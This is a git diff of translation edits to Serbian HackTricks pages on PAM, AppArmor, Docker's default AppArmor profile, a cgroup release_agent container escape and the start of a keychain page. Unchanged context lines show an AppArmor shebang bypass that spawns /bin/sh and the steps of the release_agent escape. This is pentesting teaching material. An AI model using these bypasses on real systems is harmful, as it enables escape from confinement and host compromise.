<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -28,7 +28,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
## Osnovne informacije
|
||||
|
||||
**PAM (Pluggable Authentication Modules)** deluje kao mehanizam bezbednosti koji **verifikuje identitet korisnika koji pokušavaju da pristupe računarskim uslugama**, kontrolišući njihov pristup na osnovu različitih kriterijuma. To je slično digitalnom čuvaru, osiguravajući da samo ovlašćeni korisnici mogu da koriste određene usluge, dok istovremeno može ograničiti njihovo korišćenje kako bi se sprečili preopterećenja sistema.
|
||||
**PAM (Pluggable Authentication Modules)** deluje kao mehanizam bezbednosti koji **proverava identitet korisnika koji pokušavaju da pristupe računarskim uslugama**, kontrolišući njihov pristup na osnovu različitih kriterijuma. To je slično digitalnom čuvaru, osiguravajući da samo ovlašćeni korisnici mogu da koriste određene usluge, dok potencijalno ograničava njihovo korišćenje kako bi se sprečili preopterećenja sistema.
|
||||
|
||||
### Konfiguracioni fajlovi
|
||||
|
||||
|
@ -52,14 +52,14 @@ session required /lib/security/pam_unix_session.so
|
|||
|
||||
Ove oblasti, ili grupe upravljanja, uključuju **auth**, **account**, **password**, i **session**, pri čemu svaka odgovara za različite aspekte procesa autentikacije i upravljanja sesijom:
|
||||
|
||||
- **Auth**: Potvrđuje identitet korisnika, često tražeći unos lozinke.
|
||||
- **Auth**: Potvrđuje identitet korisnika, često tražeći lozinku.
|
||||
- **Account**: Obradjuje proveru naloga, proveravajući uslove poput članstva u grupi ili vremenskih ograničenja.
|
||||
- **Password**: Upravlja ažuriranjem lozinke, uključujući provere kompleksnosti ili prevenciju od rečničkih napada.
|
||||
- **Password**: Upravlja ažuriranjem lozinke, uključujući provere kompleksnosti ili prevenciju od rečnika napada.
|
||||
- **Session**: Upravlja akcijama tokom početka ili kraja sesije servisa, poput montiranja direktorijuma ili postavljanja ograničenja resursa.
|
||||
|
||||
### **PAM Kontrole Modula**
|
||||
### **PAM Modul Kontrole**
|
||||
|
||||
Kontrole diktiraju odgovor modula na uspeh ili neuspeh, utičući na celokupan proces autentikacije. Ove kontrole uključuju:
|
||||
Kontrole određuju odgovor modula na uspeh ili neuspeh, utičući na celokupan proces autentikacije. Ove uključuju:
|
||||
|
||||
- **Required**: Neuspeh obaveznog modula rezultira konačnim neuspehom, ali tek nakon što su provereni svi sledeći moduli.
|
||||
- **Requisite**: Odmah prekida proces u slučaju neuspeha.
|
||||
|
@ -68,21 +68,21 @@ Kontrole diktiraju odgovor modula na uspeh ili neuspeh, utičući na celokupan p
|
|||
|
||||
### Primer Scenarija
|
||||
|
||||
U postavci sa više auth modula, proces prati strogi redosled. Ako modul `pam_securetty` utvrdi da je prijavni terminal neovlašćen, prijavljivanje kao root je blokirano, ali svi moduli se i dalje obrađuju zbog njegovog "required" statusa. Modul `pam_env` postavlja promenljive okoline, što potencijalno pomaže korisničkom iskustvu. Moduli `pam_ldap` i `pam_unix` rade zajedno kako bi autentifikovali korisnika, pri čemu `pam_unix` pokušava da koristi prethodno unetu lozinku, poboljšavajući efikasnost i fleksibilnost u metodama autentikacije.
|
||||
U postavci sa više auth modula, proces prati strogi redosled. Ako modul `pam_securetty` utvrdi da je prijavni terminal neovlašćen, root prijave su blokirane, ali svi moduli se i dalje obrađuju zbog njegovog "required" statusa. Modul `pam_env` postavlja promenljive okoline, što potencijalno pomaže korisničkom iskustvu. Moduli `pam_ldap` i `pam_unix` rade zajedno kako bi autentifikovali korisnika, pri čemu `pam_unix` pokušava koristiti prethodno unetu lozinku, poboljšavajući efikasnost i fleksibilnost u metodama autentikacije.
|
||||
|
||||
## Reference
|
||||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-webom** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji kradu podatke**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji krade informacije.
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera koji kradu informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -93,9 +93,9 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-a**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJATELJSTVO**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,13 +14,13 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **stealer malvera**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
|
@ -30,7 +30,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno
|
|||
|
||||
## Osnovne informacije
|
||||
|
||||
AppArmor je **kernel unapređenje dizajnirano da ograniči resurse dostupne programima putem profila po programu**, efikasno implementirajući obaveznu kontrolu pristupa (MAC) povezivanjem atributa kontrole pristupa direktno sa programima umesto sa korisnicima. Ovaj sistem funkcioniše tako što **učitava profile u kernel**, obično tokom pokretanja, a ovi profili određuju koje resurse program može da pristupi, kao što su mrežne veze, pristup sirovim soketima i dozvole za datoteke.
|
||||
AppArmor je **kernel unapređenje dizajnirano da ograniči resurse dostupne programima putem profila po programu**, efikasno implementirajući obaveznu kontrolu pristupa (MAC) povezivanjem atributa kontrole pristupa direktno sa programima umesto sa korisnicima. Ovaj sistem funkcioniše **učitavanjem profila u kernel**, obično tokom pokretanja, a ovi profili određuju koje resurse program može da pristupi, kao što su mrežne veze, pristup sirovim soketima i dozvole za datoteke.
|
||||
|
||||
Postoje dva operativna moda za AppArmor profile:
|
||||
|
||||
|
@ -63,13 +63,13 @@ aa-mergeprof #used to merge the policies
|
|||
```
|
||||
## Kreiranje profila
|
||||
|
||||
* Da biste naznačili pogođeni izvršni fajl, dozvoljeni su **apsolutni putevi i džokere** (za pretragu fajlova) za specificiranje fajlova.
|
||||
* Za označavanje pristupa koji će binarni fajl imati nad **fajlovima**, mogu se koristiti sledeće **kontrole pristupa**:
|
||||
* Da biste naznačili pogođeni izvršni fajl, dozvoljeni su **apsolutni putevi i džokeri** (za globiranje fajlova) za specificiranje fajlova.
|
||||
* Za naznačavanje pristupa koji će binarni fajl imati nad **fajlovima**, mogu se koristiti sledeće **kontrole pristupa**:
|
||||
* **r** (čitanje)
|
||||
* **w** (pisanje)
|
||||
* **m** (mapiranje u memoriju kao izvršiv)
|
||||
* **k** (zaključavanje fajla)
|
||||
* **l** (kreiranje tvrdih linkova)
|
||||
* **m** (mapiranje memorije kao izvršiv)
|
||||
* **k** (zaključavanje fajlova)
|
||||
* **l** (kreiranje čvrstih linkova)
|
||||
* **ix** (za izvršavanje drugog programa sa novim programom koji nasleđuje pravila)
|
||||
* **Px** (izvršavanje pod drugim profilom, nakon čišćenja okruženja)
|
||||
* **Cx** (izvršavanje pod djetetovim profilom, nakon čišćenja okruženja)
|
||||
|
@ -79,7 +79,7 @@ aa-mergeprof #used to merge the policies
|
|||
|
||||
### aa-genprof
|
||||
|
||||
Da biste olakšali kreiranje profila, apparmor vam može pomoći. Moguće je da **apparmor ispita akcije koje izvršni fajl obavlja, a zatim vam dozvoli da odlučite koje akcije želite dozvoliti ili zabraniti**.\
|
||||
Da biste olakšali kreiranje profila, možete koristiti apparmor. Moguće je da **apparmor inspekcijom akcija koje izvršava binarni fajl, omogući vam da odlučite koje akcije želite dozvoliti ili zabraniti**.\
|
||||
Samo treba da pokrenete:
|
||||
```bash
|
||||
sudo aa-genprof /path/to/binary
|
||||
|
@ -88,10 +88,10 @@ Zatim, u drugoj konzoli izvršite sve radnje koje binarni fajl obično izvršava
|
|||
```bash
|
||||
/path/to/binary -a dosomething
|
||||
```
|
||||
Zatim, u prvom konzoli pritisnite "**s**", a zatim u zabeleženim akcijama naznačite da li želite da ignorišete, dozvolite ili nešto drugo. Kada završite, pritisnite "**f**" i novi profil će biti kreiran u _/etc/apparmor.d/path.to.binary_
|
||||
Zatim, u prvom konzoli pritisnite "**s**", a zatim u zabeleženim akcijama naznačite da li želite da ignorišete, dozvolite ili šta god drugo. Kada završite, pritisnite "**f**" i novi profil će biti kreiran u _/etc/apparmor.d/path.to.binary_
|
||||
|
||||
{% hint style="info" %}
|
||||
Koristeći strelice možete izabrati šta želite da dozvolite/odbijete/nešto drugo
|
||||
Koristeći strelice možete izabrati da li želite da dozvolite/odbijete/šta god drugo
|
||||
{% endhint %}
|
||||
|
||||
### aa-easyprof
|
||||
|
@ -122,7 +122,7 @@ sudo aa-easyprof /path/to/binary
|
|||
}
|
||||
```
|
||||
{% hint style="info" %}
|
||||
Imajte na umu da podrazumevano u kreiranom profilu ništa nije dozvoljeno, tako da je sve zabranjeno. Morate dodati linije poput `/etc/passwd r,` da biste omogućili binarno čitanje `/etc/passwd` na primer.
|
||||
Imajte na umu da prema podrazumevanom profilu ništa nije dozvoljeno, tako da je sve zabranjeno. Morate dodati linije poput `/etc/passwd r,` da biste omogućili binarno čitanje `/etc/passwd`, na primer.
|
||||
{% endhint %}
|
||||
|
||||
Zatim možete **primeniti** novi profil sa
|
||||
|
@ -131,7 +131,7 @@ sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
|
|||
```
|
||||
### Modifikovanje profila iz logova
|
||||
|
||||
Sledeći alat će pročitati logove i pitati korisnika da li želi da dozvoli neke od detektovanih zabranjenih akcija:
|
||||
Sledeći alat će pročitati logove i pitati korisnika da li želi da dozvoli neke od detektovanih zabranjenih radnji:
|
||||
```bash
|
||||
sudo aa-logprof
|
||||
```
|
||||
|
@ -147,14 +147,14 @@ apparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain
|
|||
apparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile
|
||||
apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
|
||||
```
|
||||
## Dnevnici
|
||||
## Zapisi
|
||||
|
||||
Primeri **AUDIT** i **DENIED** dnevnika iz _/var/log/audit/audit.log_ izvršnog fajla **`service_bin`**:
|
||||
Primer **AUDIT** i **DENIED** zapisa iz _/var/log/audit/audit.log_ datoteke izvršne datoteke **`service_bin`**:
|
||||
```bash
|
||||
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
|
||||
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
|
||||
```
|
||||
Takođe možete dobiti ove informacije koristeći:
|
||||
Možete dobiti ove informacije i korišćenjem:
|
||||
```bash
|
||||
sudo aa-notify -s 1 -v
|
||||
Profile: /bin/service_bin
|
||||
|
@ -172,9 +172,9 @@ Logfile: /var/log/audit/audit.log
|
|||
AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
|
||||
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
|
||||
```
|
||||
## Apparmor u Docker-u
|
||||
## Apparmor u Dockeru
|
||||
|
||||
Primetite kako je profil **docker-profile** u docker-u učitan podrazumevano:
|
||||
Primetite kako je profil **docker-profile** u dockeru podrazumevano učitan:
|
||||
```bash
|
||||
sudo aa-status
|
||||
apparmor module is loaded.
|
||||
|
@ -195,18 +195,18 @@ Podrazumevani **Apparmor docker-default profil** generiše se sa [https://github
|
|||
**docker-default profil sažetak**:
|
||||
|
||||
* **Pristup** svim **mrežama**
|
||||
* Nijedna **sposobnost** nije definisana (Međutim, neke sposobnosti dolaze iz uključivanja osnovnih osnovnih pravila tj. #include \<abstractions/base>)
|
||||
* **Pisanje** u bilo koji **/proc** fajl nije **dozvoljeno**
|
||||
* Ostali **poddirektorijumi**/**fajlovi** od /**proc** i /**sys** su **odbijeni** pristup za čitanje/pisanje/zaključavanje/povezivanje/izvršavanje
|
||||
* **Montiranje** nije **dozvoljeno**
|
||||
* **Ptrace** se može pokrenuti samo na procesu koji je ograničen istim **apparmor profilom**
|
||||
* Nijedna **sposobnost** nije definisana (Međutim, neke sposobnosti dolaze iz osnovnih pravila uključujući osnovna pravila baze, tj. #include \<abstractions/base>)
|
||||
* **Pisanje** u bilo koji **/proc** fajl **nije dozvoljeno**
|
||||
* Ostali **poddirektorijumi**/**fajlovi** /**proc** i /**sys** su **odbijeni** pristup za čitanje/pisanje/zaključavanje/povezivanje/izvršavanje
|
||||
* **Montiranje** nije dozvoljeno
|
||||
* **Ptrace** se može izvršiti samo na procesu koji je ograničen istim **apparmor profilom**
|
||||
|
||||
Kada **pokrenete docker kontejner** trebalo bi da vidite sledeći izlaz:
|
||||
```bash
|
||||
1 processes are in enforce mode.
|
||||
docker-default (825)
|
||||
```
|
||||
Napomena da će **apparmor čak blokirati privilegije mogućnosti** dodeljene kontejneru po podrazumevanim vrednostima. Na primer, moći će **blokirati dozvolu za pisanje unutar /proc čak i ako je SYS\_ADMIN mogućnost dodeljena** jer apparmor profil za docker podrazumevano odbija ovaj pristup:
|
||||
Imajte na umu da će **apparmor čak blokirati privilegije mogućnosti** dodeljene kontejneru po podrazumevanim vrednostima. Na primer, moći će **blokirati dozvolu za pisanje unutar /proc čak i ako je SYS\_ADMIN mogućnost dodeljena** jer apparmor profil za docker podrazumevano odbija ovaj pristup:
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
|
||||
echo "" > /proc/stat
|
||||
|
@ -225,7 +225,7 @@ Napomena da možete **dodati/ukloniti** **sposobnosti** kontejneru (ovo će i da
|
|||
* `--cap-drop=ALL --cap-add=SYS_PTRACE` uklanja sve sposobnosti i daje samo `SYS_PTRACE`
|
||||
|
||||
{% hint style="info" %}
|
||||
Obično, kada **otkrijete** da imate **privilegovanu sposobnost** dostupnu **unutar** **docker** kontejnera **ali** deo **eksploatacije ne funkcioniše**, to će biti zato što docker **apparmor to sprečava**.
|
||||
Obično, kada **otkrijete** da imate **privilegovanu sposobnost** dostupnu **unutar** **docker** kontejnera **ali** deo **eksploatacije ne funkcioniše**, to će biti zato što će docker **apparmor to sprečavati**.
|
||||
{% endhint %}
|
||||
|
||||
### Primer
|
||||
|
@ -240,7 +240,7 @@ Da bismo aktivirali profil, potrebno je uraditi sledeće:
|
|||
```
|
||||
sudo apparmor_parser -r -W mydocker
|
||||
```
|
||||
Da bismo naveli profile, možemo koristiti sledeću komandu. Komanda ispod navela je moj novi AppArmor profil.
|
||||
Da biste naveli profile, možete koristiti sledeću komandu. Komanda ispod prikazuje moj novi AppArmor profil.
|
||||
```
|
||||
$ sudo apparmor_status | grep mydocker
|
||||
mydocker
|
||||
|
@ -266,9 +266,9 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
|||
|
||||
U čudnom slučaju možete **izmeniti apparmor docker profil i ponovo ga učitati.** Mogli biste ukloniti ograničenja i ih "zaobići".
|
||||
|
||||
### AppArmor Bypass putem Shebang
|
||||
### AppArmor Shebang Bypass
|
||||
|
||||
U [**ovom bug-u**](https://bugs.launchpad.net/apparmor/+bug/1911431) možete videti primer kako **čak i ako sprečavate perl da se pokreće sa određenim resursima**, ako jednostavno kreirate shell skriptu **specifikujući** u prvom redu **`#!/usr/bin/perl`** i **izvršite fajl direktno**, moći ćete da izvršite šta god želite. Na primer:
|
||||
U [**ovom bug-u**](https://bugs.launchpad.net/apparmor/+bug/1911431) možete videti primer kako **čak i ako sprečavate perl da se pokrene sa određenim resursima**, ako jednostavno kreirate shell skriptu **specifikujući** u prvom redu **`#!/usr/bin/perl`** i **izvršite fajl direktno**, moći ćete izvršiti šta god želite. Na primer:
|
||||
```perl
|
||||
echo '#!/usr/bin/perl
|
||||
use POSIX qw(strftime);
|
||||
|
@ -278,15 +278,15 @@ exec "/bin/sh"' > /tmp/test.pl
|
|||
chmod +x /tmp/test.pl
|
||||
/tmp/test.pl
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokrenut na **dark webu** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -296,7 +296,7 @@ Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za pretragu **
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
|
||||
Drugi načini podrške HackTricks-u:
|
||||
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
|
||||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
|
@ -14,15 +14,15 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web**-om koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **kradljivih malvera**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -59,8 +59,8 @@ echo 1 > /tmp/cgrp/x/notify_on_release
|
|||
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
|
||||
echo "$host_path/cmd" > /tmp/cgrp/release_agent
|
||||
```
|
||||
4. **Kreiranje i konfigurisanje skripte /cmd:**
|
||||
- Skripta /cmd se kreira unutar kontejnera i konfiguriše se da izvrši ps aux, preusmeravajući izlaz u datoteku nazvanu /output u kontejneru. Specifikovan je puni put do /output na domaćinu.
|
||||
4. **Kreiranje i konfigurisanje /cmd skripte:**
|
||||
- /cmd skripta se kreira unutar kontejnera i konfiguriše se da izvrši ps aux, preusmeravajući izlaz u datoteku nazvanu /output u kontejneru. Specifikovan je puni put do /output na hostu.
|
||||
```shell
|
||||
echo '#!/bin/sh' > /cmd
|
||||
echo "ps aux > $host_path/output" >> /cmd
|
||||
|
@ -72,15 +72,15 @@ chmod a+x /cmd
|
|||
```shell
|
||||
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade podatke**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **ugroženi** od **malvera koji krade informacije**.
|
||||
|
||||
Njihov primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera koji krade informacije.
|
||||
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihov pretraživač **besplatno** na:
|
||||
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za **besplatno** na:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -94,6 +94,6 @@ Drugi načini podrške HackTricks-u:
|
|||
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
|
||||
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
* **Podelite svoje hakovanje trikova slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -14,11 +14,11 @@ Drugi načini podrške HackTricks-u:
|
|||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) je **dark-web** pretraživač koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
[**WhiteIntel**](https://whiteintel.io) je pretraživač pokretan **dark-web-om** koji nudi **besplatne** funkcionalnosti za proveru da li je kompanija ili njeni korisnici **kompromitovani** od strane **malvera za krađu podataka**.
|
||||
|
||||
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
|
||||
|
||||
|
@ -31,17 +31,17 @@ Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za **besplatno
|
|||
## Glavni Keychain-ovi
|
||||
|
||||
